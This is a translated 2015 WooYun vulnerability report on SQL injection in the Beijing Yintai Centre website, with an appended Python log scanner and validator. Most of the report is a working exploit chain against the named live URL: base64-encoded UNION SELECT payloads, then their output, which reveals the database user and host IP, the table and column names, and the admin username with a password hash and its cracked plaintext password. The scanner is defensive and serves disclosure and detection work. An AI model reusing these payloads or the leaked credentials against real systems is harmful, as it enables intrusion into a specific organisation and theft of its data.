Vulnerability summary
Defect ID: wooyun-2015-0110245
Title: SQL injection at 北京银泰中心 (Beijing Yintai Centre)
Vendor: 北京银泰中心
Author: 神秘de路人甲
Submitted: 2015-04-27 13:04
Fixed: 2015-06-11 13:06
Published: 2015-06-11 13:06
Vulnerability type: SQL injection
Severity: High
Self-assessed rank: 10
Status: vendor could not be contacted, or the vendor actively ignored the report
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2015-04-27: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2015-06-11: The vendor has actively ignored the vulnerability; details disclosed to the public
Brief description:
SQL injection at 北京银泰中心 (Beijing Yintai Centre)
Detailed description:
http://www.yintai-centre.com/
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=MjM=
Decoding with a base64 tool shows that MjM= is 23.
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=MjMn
Returns: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' limit 1' at line 1
A base64-encoded order by probe then gives a column count of 9 (order by 9).
Union query:
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNiw3LDgsOQ==
Columns 5 and 7 are echoed on the page.
Query the database user, data directory and database version:
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixjb25jYXQodXNlcigpLEBAZGF0YWRpcixkYXRhYmFzZSgpLHZlcnNpb24oKSksOCw5
Result:
hdm0570415@223.4.80.80 /data/mysql/ hdm0570415_db 5.1.48-log
List the tables:
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixncm91cF9jb25jYXQoZGlzdGluY3QgdGFibGVfbmFtZSksOCw5ICBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0weDY4NjQ2RDMwMzUzNzMwMzQzMTM1NUY2NDYy
All tables in the database hdm0570415_db:
act,act_cat,act_cat_en,activity,activity_copy,activity_en,activity_en_copy,admin,admin_en,brand,brand_20130320,brand_en,category,category_en,download,download_en,footer,footer_en,img_index,img_index_en,lb_cat,lb_cat_en,news,news_en,rotate,rotate_en,service,user,user_en,video,video_en,videosed,videosed_en,zl_downl,zl_downl_en,zt_downl,zt_downl_en
List all columns of the admin table:
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixncm91cF9jb25jYXQoZGlzdGluY3QgY29sdW1uX25hbWUpLDgsOSAgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPTB4NjE2NDZENjk2RQ==
Result:
admin_id,username,passwd,super_admin,lastLogin,session
Query the account and password:
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixjb25jYXQodXNlcm5hbWUscGFzc3dkKSw4LDkgIGZyb20gYWRtaW4=
Result:
admin 95f66ac1d48930df6b281ea2fe24fc7d (z1Y2_Fr8)
Proof of vulnerability: same as the detailed description above.
Fix:
Filter the input, and deploy a WAF (放狗, i.e. Safedog) to block injection.
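A defender-side check for this bug, added here as an example and not code from the report or from the site: it decodes the base64 id the same way the page does and treats anything other than a plain integer as a finding, which is both the server-side validation the fix implies and a rule that can be run over web server access logs. The sample log lines and the access-log layout are assumptions; the three id values are the ones quoted above.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample request lines (assumed access-log request fields); ids are those quoted in the report.
SAMPLE_LOG = """\
GET /beijing/cn/mall/activitys.php?id=MjM= HTTP/1.1
GET /beijing/cn/mall/activitys.php?id=MjMn HTTP/1.1
GET /beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNiw3LDgsOQ== HTTP/1.1
"""

# A legitimate activity id is a short decimal integer and nothing else.
ID_RE = re.compile(rb"^[0-9]{1,10}$")

def decode_id(encoded):
    """Base64-decode the id parameter; None if it is not well-formed base64."""
    try:
        return base64.b64decode(encoded, validate=True)
    except (binascii.Error, ValueError):
        return None

def validate_id(encoded):
    """Allow-list check the fix calls for: accept only a plain integer, so the
    application binds a number and never splices decoded text into SQL."""
    raw = decode_id(encoded)
    if raw is None or not ID_RE.match(raw):
        return None
    return int(raw)

def classify_request(path):
    """Return (decoded id, verdict) for one request path."""
    params = parse_qs(urlparse(path).query)
    if "id" not in params:
        return "", "no-id"
    raw = decode_id(params["id"][0])
    if raw is None:
        return "", "bad-base64"
    return raw.decode("latin-1"), ("ok" if ID_RE.match(raw) else "suspicious")

def scan_log(text):
    """(path, decoded id, verdict) for each request whose id is not a clean integer."""
    findings = []
    for line in text.splitlines():
        path = line.split()[1]  # request lines are assumed well-formed
        decoded, verdict = classify_request(path)
        if verdict in ("suspicious", "bad-base64"):
            findings.append((path, decoded, verdict))
    return findings
```

Running `scan_log(SAMPLE_LOG)` flags the quote probe and the union request while the genuine id=MjM= request passes; the same `validate_id` check in the PHP handler would have rejected both before any query ran.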
Copyright notice: when reposting, credit the source 神秘de路人甲@乌云
Vulnerability response
Vendor response:
Vendor could not be contacted, or the vendor actively declined
Vulnerability rank: 15 (WooYun assessment)